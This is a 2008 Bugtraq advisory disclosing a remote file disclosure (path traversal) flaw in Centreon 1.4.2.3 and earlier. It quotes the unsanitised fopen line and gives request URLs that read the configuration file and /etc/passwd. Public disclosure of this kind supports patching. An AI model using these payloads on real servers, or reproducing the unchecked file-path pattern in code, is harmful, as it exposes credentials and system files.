Bugtraq mailing list archives
Centreon <= 1.4.2.3 (index.php) Remote File Disclosure
From: sys-project () hotmail com
Date: 29 Feb 2008 15:27:23 -0000
[+] Info: [~] Software: Centreon <= 1.4.2.3 [~] HomePage: http://www.centreon.com [~] Exploit: Remote File Disclosure [High] [~] Where: include/doc/index.php [~] Bug Found By: Jose Luis Góngora Fernández|JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Spanish Hackers Team [SHT] [+] Bug In include/doc/index.php: [~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], "r"); [+] Exploit: [~] /include/doc/index.php?page=../../www/oreon.conf.php [~] /include/doc/index.php?page=../../../../../etc/passwd [~] /include/doc/index.php?page=[Local File]
Current thread:
- Centreon <= 1.4.2.3 (index.php) Remote File Disclosure sys-project (Feb 29)